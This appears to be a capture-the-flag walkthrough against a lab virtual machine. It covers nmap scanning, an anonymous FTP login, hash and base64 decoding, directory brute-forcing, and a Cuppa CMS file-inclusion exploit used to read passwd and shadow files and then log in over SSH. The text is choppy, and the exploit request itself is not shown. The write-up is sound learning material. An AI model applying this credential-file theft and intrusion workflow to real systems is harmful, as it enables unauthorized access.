1. Nmap Scan
1. scan local network to see what is the target machine ip(not open yet)
sudo nmap -sn 192.168.134.0/24Now open the target machine and then scan againwe can see the additional IP :192.168.134.130This is the target IP
2. Use this IP to see what else information we can get
sudo nmap -sT -sV -O 192.168.134.130Port 21,22,80,3306 is opened, each of them are running service, this is for TCPsudo nmap -sU 192.168.134.130UDP have no port are opened, so can ignore UDPFor now, we have information what port the target is opened, so we need to step into it, to try if we can get more info via the portsudo nmap -sT -sC -sV -O -p21,22,80,3306 192.168.134.130this is most heavy scan
2. Look into port
1. FTP
we can see this ftp service allow
anonymous to login, so we can just login to it, so we can find those files.those files shown your info blow
code
01ec2d8fc11c493b25029fb1f47f39ce is obvious a encypt work, but we can’t identity what algorithm are used, but we can use hash-identifier to justify what code is.so we can identifier this code is encypt by MD5, next step is use internet search MD5 crack.
after search, we can know this code means
01ec2d8fc11c493b25029fb1f47f39ce:This is not a passwordso, next,
SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg== bash64 , it is easy to see that code is.It is easy, but not that easy..others info just write down here , see if we can use it.
2. HTTP
Port 80 is open
use
dirb to scan path, we can find it useful path http://192.168.134.130/administrator/installation/
using cuppa cms service, can search this service if it have vulnerability.
searchsploit cuppa CMS
find it, try it, but seems itn’t the answer,
goto this software link to what the practical code.
can see the code change to POST method, so use post and try again.
passwd:
Nice! we can use same way gain shadow
wipe off those has no hash.
Here is the accountname and password!
try ssh into it
Completed.